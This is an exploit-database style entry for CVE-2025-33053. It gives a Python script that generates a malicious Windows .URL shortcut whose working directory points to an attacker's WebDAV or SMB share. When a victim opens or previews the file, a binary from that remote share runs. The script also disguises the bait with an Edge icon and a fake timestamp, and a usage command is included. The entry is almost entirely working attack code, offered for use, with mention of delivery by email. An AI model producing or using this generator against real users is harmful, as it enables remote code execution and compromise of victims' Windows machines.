Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE) Date: June 2025 Author: Dev Bui Hieu Tested on: Windows 10, Windows 11 Platform: Windows Type: Remote CVE: CVE-2025-33053 Description: This exploit leverages the behavior of Windows .URL files to execute a remote binary over a UNC path. When a victim opens or previews the .URL file (e.g. from email), the system may automatically reach out to the specified path (e.g. WebDAV or SMB share), leading to arbitrary code execution without prompt. ```bash python3 gen_url.py --ip 192.168.1.100 --out doc.url ``` import argparse def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified): content = f"""[InternetShortcut] URL={url_target} WorkingDirectory={working_directory} ShowCommand=7 IconIndex={icon_index} IconFile={icon_file} Modified={modified} """ with open(output_file, "w", encoding="utf-8") as f: f.write(content) print(f"[+] .url file created: {output_file}") def main(): parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)") parser.add_argument('--out', default="bait.url", help="Output .url file name") parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path") parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)") parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe", help="Target executable path on victim machine") parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe", help="Icon file path") parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)") parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)") args = parser.parse_args() working_directory = fr"\\{args.ip}\{args.share}\\" generate_url_file( output_file=args.out, url_target=args.exe, working_directory=working_directory, icon_file=args.icon, icon_index=args.index, modified=args.modified ) if __name__ == "__main__": main()